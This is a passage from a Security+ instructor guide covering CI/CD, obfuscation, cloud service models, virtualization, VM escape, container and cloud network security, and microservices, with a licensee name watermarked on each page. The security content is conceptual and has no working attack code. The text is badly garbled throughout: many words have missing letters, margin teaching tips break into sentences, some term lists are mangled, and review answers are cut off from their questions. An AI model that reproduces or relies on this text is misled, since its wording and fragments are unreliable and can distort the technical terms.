satisfies its purpose. As well as removing the application itself, it is also important to
make appropriate environment changes to remove any configurations such as open
firewall ports that were made ust to support that application.
Version Control
Version control is an ID system for each iteration of a software product. Most version
control numbers represent both the version, as made known to the customer or end
user, and internal build numbers for use in the development process. Version control
supports the change management process for software development pro ects. Most
software development environments use a build server to maintain a repository of
previous versions of the source code. When a developer commits new or changed
code to the repository, the new source code is tagged with an updated version number Show Slide(s)
and the old version archived. This allows changes to be rolled back if a problem is
discovered.
Automation/Scripting
Release Paradigms
Automation/Scripting Release Paradigms
Teaching
Coding pro ects are managed using di erent life cycle models. The waterfall model Tip
software development life cycle (SDLC) is an older paradigm that focuses on the Make sure students
successful completion of monolithic pro ects that progress from stage to stage. The can distinguish these
more recent Agile paradigm uses iterative processes to release well-tested code phases.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
402 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
in smaller blocks or units. In this model, development and provisioning tasks are
conceived as continuous.
Continuous Integration
Continuous integration (CI) is the principle that developers should commit and test
updates often—every day or sometimes even more frequently. This is designed to
reduce the chances of two developers spending time on code changes that are later
found to con ict with one another. CI aims to detect and resolve these con icts early,
as it is easier to diagnose one or two con icts or build errors than it is to diagnose the
causes of tens of them. or e ective CI, it is important to use an automated test suite
to validate each build quickly.
Continuous Delivery
Where CI is about managing code in development, continuous delivery is about
testing all of the infrastructure that supports the app, including networking, database
functionality, client software, and so on.
Continuous Deployment
Where continuous delivery tests that an app version and its supporting infrastructure
are ready for production, continuous deployment is the separate process of actually
making changes to the production environment to support the new app version.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 403
ensure that they are recovery ready. You can also automate the courses of action that
a monitoring system takes, like configuring an I to automatically block traffic that
it deems suspicious. This sort of capability is provided by security orchestration and
response (SOAR) management software.
Continuous Validation
An application model is a statement of the requirements driving the software
development pro ect. The re uirements model is tested using processes of verification
and validation (V&V):
• erification is a compliance testing process to ensure that the product or system
meets its design goals.
• alidation is the process of determining whether the application is fit for purpose
(so for instance, its design goals meet the user requirements).
With the continuous paradigm, feedback from delivery and deployment must be
monitored and evaluated to ensure that the design goals continue to meet user and
security requirements. The monitoring and validation processes must also ensure that
there is no drift from the secure configuration baseline.
An application's runtime environment will use one of two approaches for execution on Software Diversity
a host system:
• Compiled code is converted to binary machine language that can run independently
on the target OS.
oftware diversity can refer to obfuscation techni ues to make code difficult to detect
as malicious. This is widely used by threat actors in the form of shellcode compilers
to avoid signature detection, such as the venerable Shikata Ga Nai (fireeye.com blog
threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html). This can
be used as a defensive technique. Obfuscating API methods and automation code
makes it harder for a threat actor to reverse engineer and analyze the code to discover
weaknesses.
There is also general research interest in security by diversity. This works on the
principle that attacks are harder to develop against non-standard environments. A
monoculture environment, such as a Windows domain network, presents a fairly
predictable attack surface with plenty of commodity malware tools available to exploit
misconfigurations. sing a wide range of development tools and application
vendors and versions can make attack strategies harder to research. As with security
by obscurity, this will not defeat a targeted attack, but it can partially mitigate risks
from less motivated threat actors, who will simply move to the next, easier target.
On the other hand, this sort of complexity will tend to lead to greater incidence of
configuration errors as technicians and developers struggle to master unfamiliar
technologies.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
404 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
eployment and Automation oncepts
Answer the following questions:
Continuous deployment.
The compiler can apply obfuscation routines to make the code difficult for a threat
actor to reverse engineer and analyze for vulnerabilities.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 405
Lesson 14
Summary
You should be able to identify and classify application attacks and summarize Teaching
development and coding best practices. Tip
Check that students
Guidelines for Secure Application Development are confident about
the content that has
been covered. If there
ollow these guidelines for initiating or improving application development pro ects
is time, revisit any
• Train developers on secure coding techni ues to provide specific mitigation content examples that
against attacks they have questions
about. If you have
used all the available
• ver ow, race condition, and DLL driver manipulation attacks that e ploit
time for this lesson
vulnerable code. block, note the issues,
and schedule time for
• In ection attacks , L, ML, LDA , shellcode that e ploit lack of input a review later in the
validation. course.
• Replay and request forgery attacks that exploit lack of secure authentication and
authorization mechanisms.
• Review and test code using static and dynamic analysis, paying particular attention
to input validation, output encoding, error handling, and data exposure.
• Document use of approved coding languages and launch locations, ideally with code
signing, to make malicious code easier to detect.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 15
Implementing Secure Cloud Solutions
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
408 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 15A
Summarize Secure Cloud and
Virtualization Services
This type of cloud could be on premise or o site relative to the other business
units. An onsite link can obviously deliver better performance and is less likely to
be subject to outages (loss of an Internet link, for instance). On the other hand, a
dedicated o site facility may provide better shared access for multiple users in
di erent locations.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 409
There will also be cloud computing solutions that implement some sort of hybrid
public private community hosted onsite o site solution. or e ample, a travel
organization may run a sales website for most of the year using a private cloud
but break out the solution to a public cloud at times when much higher utilization
is forecast.
le ibility is a key advantage of cloud computing, but the implications for data risk
must be well understood when moving data between private and public storage
environments.
As well as the ownership model (public, private, hybrid, or community), cloud services Cloud Service Models
are often di erentiated on the level of comple ity and pre configuration provided.
These models are referred to as something or anything as a service (XaaS). The three
most common implementations are infrastructure, software, and platform.
Infrastructure as a Service
Infrastructure as a service (IaaS) is a means of provisioning IT resources such as
servers, load balancers, and storage area network (SAN) components quickly. Rather
than purchase these components and the Internet links they require, you rent them on
an as-needed basis from the service provider's data center. Examples include Amazon
Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual Machines
(azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.com/cloud), and
OpenStack (openstack.org).
Software as a Service
Software as a service (SaaS) is a di erent model of provisioning software
applications. Rather than purchasing software licenses for a given number of seats,
a business would access software hosted on a supplier's servers on a pay-as-you-
go or lease arrangement (on-demand). Virtual infrastructure allows developers to
provision on-demand applications much more quickly than previously. The applications
can be developed and tested in the cloud without the need to test and deploy on
client computers. amples include Microsoft ffice microsoft.com/en-us/
microsoft enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.
google.com).
Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS.
A typical PaaS solution would provide servers and storage network infrastructure
(as per IaaS) but also provide a multi-tier web application/database platform on top.
This platform could be based on Oracle or MS SQL or PHP and MySQL. Examples
include Oracle Database (oracle.com/database), Microsoft Azure SQL Database (azure.
microsoft.com/services/sql-database), and Google App Engine (cloud.google.com/
appengine).
As distinct from aa though, this platform would not be configured to actually
do anything. Your own developers would have to create the software (the CRM or
e-commerce application) that runs using the platform. The service provider would
be responsible for the integrity and availability of the platform components, but you
would be responsible for the security of the application you created on the platform.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
410 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS.
(Screenshot used with permission from Amazon.com.)
ote that this matrix identifies generic responsibilities only. Specific terms must be set out in
a contract and service level agreement (SLA) with the CSP.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 411
The breadth of technologies re uiring specialist security knowledge and configuration Security as a Service
makes it likely that companies will need to depend on third-party support at some
point. You can classify such support in three general "tiers":
• Consultants—the experience and perspective of a third-party professional can
be hugely useful in improving security awareness and capabilities in any type of
organization (small to large). Consultants could be used for "big picture" framework
analysis and alignment or for more specific or product focused pro ects pen
testing, SIEM rollout, and so on). It is also fairly simple to control costs when using
consultants if they are used to develop capabilities rather than implement them.
here consultants come to own the security function, it can be difficult to change
or sever the relationship.
• Security as a Service (SECaaS) can mean lots of di erent things, but is typically
distinguished from an MSSP as being a means of implementing a particular security
control, such as virus scanning or SIEM-like functionality, in the cloud. Typically,
there would be a connector to the cloud service installed locally. or e ample, an
antivirus agent would scan files locally but be managed and updated from the
cloud provider; similarly a log collector would submit events to the cloud service
for aggregation and correlation. amples include Cloud are cloud are.com saas),
Mandiant ire ye fireeye.com mandiant managed detection and response.html),
and SonicWall (sonicwall.com/solutions/service-provider/security-as-a-service .
Virtualization means that multiple operating systems can be installed and run Virtualization
simultaneously on a single computer. A virtual platform requires at least three Technologies and
components: Hypervisor Types
• Host hardware—the platform that will host the virtual environment. Optionally,
Teaching
there may be multiple hosts networked together.
Tip
• Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine This is a recap of the
environment and facilitates interaction with the computer hardware and network. basics. Hopefully
students should know
• Guest operating systems, Virtual Machines (VM), or instances—operating systems this material already.
installed under the virtual environment.
One basic distinction that can be made between virtual platforms is between host
and bare metal methods of interacting with the host hardware. In a guest OS (or
host-based) system, the hypervisor application (known as a Type II hypervisor) is itself
installed onto a host operating system. Examples of host-based hypervisors include
VMware Workstation, Oracle Virtual Box, and Parallels Workstation. The hypervisor
software must support the host OS.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
412 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A bare metal virtual platform means that the hypervisor (Type I hypervisor) is installed
directly onto the computer and manages access to the host hardware without going
through a host OS. Examples include VMware ESXi Server, Microsoft's Hyper-V, and
Citrix's XEN Server. The hardware needs only support the base system requirements
for the hypervisor plus resources for the type and number of guest OSes that will
be installed.
Type I bare metal hypervisor The hypervisor is installed directly on the host hardware along with
a management application, then s are installed within the hypervisor.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 413
Microsoft emote Desktop or Citri ICA, for instance . The thin client has to find the
correct image and use an appropriate authentication mechanism. There may be a 1:1
mapping based on machine name or I address or the process of finding an image may
be handled by a connection broker.
All application processing and data storage in the virtual desktop environment
(VDE) or workspace is performed by the server. The thin client computer must only
be powerful enough to display the screen image, play audio, and transfer mouse, key
commands and video, and audio information over the network. All data is stored on
the server, so it is easier to back up and the desktop VMs are easier to support and
troubleshoot. They are better "locked" against unsecure user practices because any
changes to the VM can easily be overwritten from the template image. With VDI, it is
also easier for a company to completely o oad their IT infrastructure to a third party
services company.
The main disadvantage is that in the event of a failure in the server and network
infrastructure, users have no local processing ability, so downtime events may be more
costly in terms of lost productivity.
Application virtualization is a more limited type of VDI. Rather than run the whole Application
client desktop as a virtual platform, the client either accesses an application hosted on Virtualization
a server or streams the application from the server to the client for local processing. and Container
Most application virtualization solutions are based on Citrix XenApp (formerly Virtualization
Meta rame resentation erver , though Microsoft has developed an App product
with its Windows Server range and VMware has the ThinApp product. These solution
types are now often used with TML remote desktop apps, referred to as clientless
because users can access them through ordinary web browser software.
Application cell/container virtualization dispenses with the idea of a hypervisor and
instead enforces resource separation at the operating system level. The defines
isolated "cells" for each user instance to run in. Each cell or container is allocated CPU
and memory resources, but the processes all run through the native OS kernel. These
containers may run slightly di erent distributions but cannot run guest es of
di erent types you could not run indows or buntu in a ed at Linu container, for
instance). Alternatively, the containers might run separate application processes, in
which case the variables and libraries required by the application process are added to
the container.
One of the best-known container virtualization products is Docker (docker.com).
Containerization underpins many cloud services. In particular it supports microservices
and serverless architecture. Containerization is also being widely used to implement
corporate workspaces on mobile devices.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
414 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Teaching
Tip VM Escape Protection
One of the main
concerns is that VM escaping refers to malware running on a guest OS jumping to another guest
the technology or to the host. To do this, the malware must identify that it is running in a virtual
underpinning the environment, which is usually simple to do. One means of doing so is through a timing
virtual platform attack. The classic timing attack is to send multiple usernames to an authentication
will not be well server and measure the server response times. An invalid username will usually
understood by
be rejected very quickly, but a valid one will take longer (while the authentication
developers and
administrators. server checks the password). This allows the attacker to harvest valid usernames.
Details of the Malware can use a timing attack within a guest OS to detect whether it is running in
implementation may a VM (certain operations may take a distinct amount of time compared to a "real"
also be proprietary. environment). There are numerous other "signatures" that an attacker could use to
This might be a detect the presence of virtualized system hardware. The next step in VM escaping is for
good opportunity to
discuss Meltdown and
the attacker to compromise the hypervisor. Security researchers have been focusing on
Spectre (csoonline. this type of exploit and several vulnerabilities have been found in popular hypervisors.
com article
One serious implication of VM escaping is where virtualization is used for hosted
spectre-and-
meltdown-explained- applications. If you have a hosted web server, apart from trusting the hosting provider
what-they-are-how- with your data, you have no idea what other applications might be running in other
they-work-whats- customers' Ms. or e ample, consider a scenario where you have an e commerce web
at-risk.html). These server installed on a virtual server leased from an ISP. If a third-party installs another
vulnerabilities guest OS with malware that can subvert the virtual server's hypervisor, they might
aren't specific to
hypervisors, but
be able to gain access to your server or to data held in the memory of the physical
they are particularly server. Having compromised the hypervisor, they could make a copy of your server
serious in a virtualized image and download it to any location. This would allow the attacker to steal any
environment. You can unencrypted data held on the e-commerce server. Even worse, it could conceivably
also point students to allow them to steal encrypted data, by obtaining the private encryption keys stored on
the following analysis the server or by sniffing unencrypted data or a data encryption key from the physical
of a typical VM escape
vulnerability: mcafee.
server's memory.
com/blogs/other- It is imperative to monitor security bulletins for the hypervisor software that you
blogs/mcafee-labs/
operate and to install patches and updates promptly. You should also design the
analyzing-patch-of-
a-virtual-machine- M architecture carefully so that the placement of Ms running di erent types of
escape-on-vmware. applications with di erent security re uirements does not raise unnecessary risks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 415
Isolating s in different zones on separate hardware This should reduce the impact
of a VM escaping attack. (Images © 123RF.com.)
As well as securing the hypervisor, you must also treat each VM as you would any VM Sprawl Avoidance
other network host. This means using security policies and controls to ensure the
confidentiality, integrity, and availability of all data and services relying on host
virtualization.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
416 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Each VM needs to be installed with its own security software suite to protect against
malware and intrusion attempts. Each guest must also have a patch management
process. This might mean installing updates locally or replacing the guest instance from
an updated VM template image.
Ordinary antivirus software installed on the host will OT detect viruses infecting the guest
OS. Scanning the virtual disks of guest OSes from the host will cause serious performance
problems.
Although one of the primary benefits of virtuali ation is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets can also
be the root of security issues. It will often be the case that a system will be brought up
for "just a minute" to test something, but languish for months or years, undocumented,
unsecured, and unpatched. Each of these undocumented systems could represent an
exploitable vulnerability. They increase the potential attack surface of the network.
Policies and procedures for tracking, securing, and, when no longer used, destroying
virtualized assets should be put in place and carefully enforced.
Virtual machine life cycle management (VMLM) software can be deployed to enforce
VM sprawl avoidance. VMLM solutions provide you with a centralized dashboard for
maintaining and monitoring all the virtual environments in your organization. More
generally, the management procedures for developing and deploying machine images
need to be tightly drafted and monitored. VMs should conform to an application-
specific template with the minimum configuration needed to run that application
(that is, not running unnecessary services). Images should not be run in any sort of
environment where they could be infected by malware or have any sort of malicious
code inserted. One of the biggest concerns here is of rogue developers or contractors
installing backdoors or "logic bombs" within a machine image. The problem of criminal
or disgruntled sta is obviously one that a ects any sort of security environment, but
concealing code within VM machine images is a bit easier to accomplish and has the
potential to be much more destructive.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 417
Review Activity:
Secure Cloud and Virtualization Services
A solution hosted by a third party cloud service provider (CSP) and shared between
subscribers (multi-tenant). This sort of cloud solution has the greatest security
concerns.
Software that manages virtual machines that has been installed to a guest OS. This is in
contrast to a Type I (or "bare metal") hypervisor, which interfaces directly with the host
hardware.
4. What is a VDE?
VM escaping refers to attacking other guest OSes or the hypervisor or host from within
a virtual machine. Attacks may be to steal information, perform Denial of Service (DoS),
infect the system with malware, and so on.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
418 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 15B
Apply Cloud Security Solutions
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 419
You must also consider the risk of insider threat, where the insiders are administrators
working for the service provider. ithout e ective security mechanisms such as
separation of duties and M of N control, it is highly likely that they would be able to
gain privileged access to your data. Consequently, the service provider must be able
to demonstrate to your satisfaction that they are prevented from doing so. There is
also the risk described earlier that your data is in proximity to other, unknown virtual
servers and that some sort of attack could be launched on your data from another
virtual server.
The Twitter hack affecting high-profile accounts being hi acked for a bitcoin scam is a good
illustration of the risks from insider threat (scmagazine.com home security-news insider-
threats twitter-hack-is-a-reminder-of-the-dangers-of-unfettered-employee-access).
As with any contracted service, with any aa solution, you place a large amount of
trust in the service provider. The more important the service is to your business, the
more risk you are investing in that trust relationship.
Clouds use the same types of security controls as on-premises networks, including Cloud Security
identity and access management (IAM), endpoint protection (for virtual instances), Controls
resource policies to govern access to data and services, firewalls to filter traffic
between hosts, and logging to provide an audit function. Teaching
Tip
Most CSP's will provide these security controls as native functionality of the cloud
Highlight the
platform. oogle's firewall service is an e ample of this type of cloud native control
similarities to on-
(cloud.google.com firewalls . The controls can be deployed and configured using premises security
either the CSP's web console, or programmatically via a command line interface (CLI) tasks.
or application programming interface (API). A third-party solution would typically be
installed as a virtual instance within the cloud. or e ample, you might prefer to run
a third party ne t generation firewall. This can be configured as an appliance and
deployed to the cloud. The virtual network architecture can be defined so that this
appliance instance is able to inspect traffic and apply policies to it, either by routing
the traffic through the instance or by using some type of bridging or mirroring. As an
e ample, consider the configuration guide for the arracuda ne t gen firewall campus.
barracuda.com product cloudgenfirewall doc overview).
The same considerations can be made for other types of security controls—notably
data loss prevention and compliance management. Cloud native controls might
not exist for these use cases, they might not meet the functional requirements that
third party solutions can, and there may be too steep a transition in terms of change
management and skills development.
Secrets Management
A cloud service is highly vulnerable to remote access. A failure of credential
management is likely to be exploited by malicious actors. You must enforce strong
authentication policies to mitigate risks:
• Do not use the root user for the CSP account for any day-to-day logon activity.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
420 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Container Security
A container uses many shared components on the underlying platform, meaning it
must be carefully configured to reduce the risk of data e posure. In a container engine
such as Docker, each container is isolated from others through separate namespaces
and control groups (docs.docker.com/engine/security/security). Namespaces prevent
one container reading or writing processes in another, while control groups ensure
that one container cannot overwhelm others in a DoS-type attack.
• Latency—this is the time in milliseconds (ms) taken for the service to respond to an
A I call. This can be measured for specific services or as an aggregate value across
all services. igh latency usually means that compute resources are insufficient. The
cause of this could be genuine load or DDoS, however.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 421
Instance Awareness
As with on-premises virtualization, it is important to manage instances (virtual
machines and containers) to avoid sprawl, where undocumented instances are
launched and left unmanaged. As well as restricting rights to launch instances, you
should configure logging and monitoring to track usage.
Where the compute component refers to CPU and system memory resources, the Cloud Storage Security
storage component means the provisioning of peristent storage capacity. As with the
compute component, the cloud virtualization layer abstracts the underlying hardware Teaching
to provide the required storage type, such as a virtual hard disk for a VM instance, Tip
ob ect based storage to serve static files in a web application, or block storage for use Make sure students
by a database server. torage profiles will have di erent performance characteristics can recognize a JSON
for di erent applications, such as fast D backed storage for databases versus slower format resource
HDD-backed media for archiving. The principal performance metric is the number of policy.
input/output operations per second (IOPS) supported.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
422 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
To read or write the data, the AES key must be available to the VM or container using
the storage object. With CSP-managed keys, the cloud provider handles this process
by using the access control rights configured on the storage resource to determine
whether access is approved and, if so, making the key available to the VM or container.
The key will be stored in a hardware security module (HSM) within the cloud. The HSM
and separation of duties policies protect the keys from insider threat. Alternatively,
customers can manage keys themselves, taking on all responsibility for secure
distribution and storage.
ncryption can also be applied at other levels. or e ample, applications can selectively
encrypt file system ob ects or use database level encryption to encrypt fields and or
records. All networking—whether customer to cloud or between VMs/containers within
the cloud—should use encrypted protocols such as HTTPS or IPSec.
Replication
Data replication allows businesses to copy data to where it can be utilized most
e ectively. The cloud may be used as a central storage area, making data available
among all business units. Data replication requires low latency network connections,
security, and data integrity. C s o er several data storage performance tiers
(cloud.google.com/storage/docs/storage-classes). The terms hot and cold storage
refer to how quickly data is retrieved. Hot storage retrieves data more quickly than
cold, but the uicker the data retrieval, the higher the cost. Di erent applications have
diverse replication requirements. A database generally needs low-latency, synchronous
replication, as a transaction often cannot be considered complete until it has been
made on all replicas. A mechanism to replicate data files to backup storage might not
have such high requirements, depending on the criticality of the data.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 423
Within the cloud, the CSP establishes a virtualization layer that abstracts the underlying Cloud Networking
physical network. This allows the CSP to operate a public cloud where the networking Security
performed by each customer account is isolated from the others. In terms of customer-
configured cloud networking, there are various conte ts Teaching
Tip
• Networks by which the cloud consumer operates and manages the cloud systems.
Note that VPC is
• Virtual networks established between VMs and containers within the cloud. synonymous with
virtual network.
• Virtual networks by which cloud services are published to guests or customers on
the Internet.
The following notes focus on features of networking in AWS. Other vendors support similar
functionality, though sometimes with different terminology. or example, in icrosoft Azure,
VPCs are referred to as virtual networks.
The instance network adapter is not configured with this public IP address. The instance s
IC is configured with an IP address for the subnet. The public address is used by the
virtualization management layer only. Public IP addresses can be assigned from your own
pool or from a CSP-managed service, such as Amazon s Elastic IP (docs.aws.amazon.com/
AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html).
There are other ways to provision external connectivity for a subnet if it is not
appropriate to make it public:
• NAT gateway—this feature allows an instance to connect out to the Internet or to
other AWS services, but does not allow connections initiated from the Internet.
• VPN—there are various options for establishing connections to and between VPCs
using virtual private networks (VPNs) at the software layer or using CSP-managed
features.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
424 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Amazon s white paper sets out options for configuring multi- PC infrastructure in more
detail (d1.awsstatic.com/whitepapers/building-a-scalable-and-secure-multi-vpc-aws-
network-infrastructure.pdf).
Gateway Endpoints
A gateway endpoint is used to connect instances in a C to the A storage and
DynamoD database services. A gateway endpoint is configured as a route to the
service in the VPC's route table.
Interface Endpoints
An interface endpoint makes use of AWS's PrivateLink feature to allow private access to
custom services:
• A custom service provider C is configured by publishing the service with a DN
host name. Alternatively, the service provider might be an Amazon default service
that is enabled as a VPC interface endpoint, such as CloudWatch Events/Logs.
• ach instance within the C subnet is configured to use the endpoint address to
contact the service provider.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 425
As in an on premises network, a firewall determines whether to accept or deny discard Cloud irewall ecurity
incoming and outgoing traffic. irewalls work with multiple accounts, Cs, subnets
within VPCs, and instances within subnets to enforce the segmentation required by
the architectural design. egmentation may be needed for many di erent reasons,
including separating workloads for performance and load balancing, keeping data
processing within an isolated segment for compliance with laws and regulations,
and compartmentali ing data access and processing for di erent departments or
functional requirements.
iltering decisions can be made based on packet headers and payload contents at
various layers, identified in terms of the I model
• Network layer layer the firewall accepts or denies connections on the basis of
IP addresses or address ranges and TCP/UDP port numbers (the latter are actually
contained in layer headers, but this functionality is still always described as basic
layer packet filtering .
• Transport layer layer the firewall can store connection states and use rules to
allow established or related traffic. ecause the firewall must maintain a state table
of existing connections, this requires more processing power (CPU and memory).
• Application layer layer the firewall can parse application protocol headers
and payloads such as TT packets and make filtering decisions based on their
contents. This requires even greater processing capacity (or load balancing), or the
firewall will become a bottleneck and increase network latency.
hile you can use cloud based firewalls to implement on premises network security,
here we are primarily concerned with the use of firewalls to filter traffic within and to
and from the cloud itself. uch firewalls can be implemented in several ways to suit
di erent purposes
• As software running on an instance. This sort of host based firewall is identical
to ones that you would configure for an on premises host. It could be a stateful
packet filtering firewall or a web application firewall A with a ruleset tuned to
preventing malicious attacks. The drawback is that the software consumes instance
resources and so is not very efficient. Also, managing the rulesets across many
instances can be challenging.
• As a service at the virtuali ation layer to filter traffic between C subnets and
instances. This e uates to the concept of an on premises network firewall.
Native cloud application aware firewalls incur transaction costs, typically calculated on
time deployed and traffic volume. These costs might be a reason to choose a third
party solution instead of the native control.
In A , basic packet filtering rules managing traffic that each instance will accept can Security Groups
be managed through security groups (docs.aws.amazon.com/vpc/latest/userguide/
VPC_SecurityGroups.html). A security group provides stateful inbound and outbound Teaching
filtering at layer . The stateful filtering property means that it will allow established Tip
and related traffic if a new connection has been accepted. A security group is a
The default security group allows any outbound traffic and any inbound traffic from collection of firewall
rules that can be
instances also bound to the default security group. A custom security group sets the
applied to one or
ports and endpoints that are allowed for inbound and outbound traffic. There are more instances,
no deny rules for security groups any traffic that does not match an allow rule is working like a virtual
dropped. Conse uently, a custom group with no rules will drop all network traffic. host firewall.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
426 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Multiple instances can be assigned to the same security group, and instances within
the same subnet can be assigned to di erent security groups. ou can assign multiple
security groups to the same instance. You can also assign security groups to VPC
endpoint interfaces.
Adding a custom security group when launching a new instance in A S EC . This policy allows SS
access from a single IP address (redacted) and access to TTPS from any IP address.
Most cloud providers support similar filtering functionality, though they may be
implemented di erently. or e ample, in A ure, network security groups can be
applied to network interfaces or to subnets (docs.microsoft.com/en-us/azure/virtual-
network/security-overview).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 427
• everse pro y this is positioned at the cloud network edge and directs traffic to
cloud services if the contents of that traffic comply with policy. This does not re uire
configuration of the users' devices. This approach is only possible if the cloud
application has proxy support.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
428 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Cloud Security Solutions
Answer the following questions:
1. Describe some key considerations that should be made when hosting data
or systems via a cloud solutions provider.
Integrate auditing and monitoring procedures and systems with on-premises detection,
identify responsibility for implementing security controls (such as patching or backup),
identify performance metrics in an LA, and assess risks to privacy and confidentiality
from breaches at the service provider.
2. True or false? The account with which you register for the CSP services is
not an account with root privileges.
alse. This account is the root account and has full privileges. It should not be used for
day to day administration or configuration.
alse. There are limits to the number of virtual private clouds Cs that can be
created, but more than one is allowed.
This is accomplished by assigning the instance to a security group with the relevant
policy configured.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 429
Topic 15C
Summarize Infrastructure
as ode oncepts
In the early days of computer networks, architecture was focused on the provision
Services Integration
of server machines and intermediate network systems (switches and routers). and Microservices
Architectural choices centered around where to place a "box" to run monolithic
network applications such as routing, security, address allocation, name resolution, Teaching
file sharing, email, and so on. ith virtuali ation, the provision of these applications Tip
is much less dependent on where you put the box and the OS that the box runs. Contrast the legacy
irtuali ation helps to make the design architecture fit to the business re uirement IT focus on deploying
rather than accommodate the business work ow to the platform re uirement. boxes with the
modern paradigm of
Service-Oriented Architecture (SOA) abstracted, virtualized
compute, storage,
Service-oriented architecture (SOA) conceives of atomic services closely mapped and network capacity
that can be spun up,
to business work ows. ach service takes defined inputs and produces defined
perform a workload,
outputs. The service may itself be composed of sub-services. The key features of and then released for
a service function are that it is self-contained, does not rely on the state of other the next task.
services, and exposes clear input/output (I/O) interfaces. Because each service has a
simple interface, interoperability is made much easier than with a complex monolithic
application. The implementation of a service does not constrain compatibility choices
for client services, which can use a di erent platform or development language. This
independence of the service and the client requesting the service is referred to as
loose coupling.
Microservices
Microservice-based development shares many similarities with Agile software project
management and the processes of continuous delivery and deployment. It also shares
roots with the Unix philosophy that each program or tool should do one thing well.
The main di erence between A and microservices is that A allows a service to be
built from other services. By contrast, each microservice should be capable of being
developed, tested, and deployed independently. The microservices are said to be highly
decoupled rather than ust loosely decoupled.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
430 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 431
interacting with other functions to facilitate client requests. When the client requires
some operation to be processed, the cloud spins up a container to run the code,
performs the processing, and then destroys the container. Billing is based on execution
time, rather than hourly charges. This type of service provision is also called function
as a service aa . aa products include A Lambda aws.amazon.com/lambda),
oogle Cloud unctions cloud.google.com/functions , and Microsoft A ure unctions
(azure.microsoft.com/services/functions).
The serverless paradigm eliminates the need to manage physical or virtual server
instances, so there is no management e ort for software and patches, administration
privileges, or file system security monitoring. There is no re uirement to provision
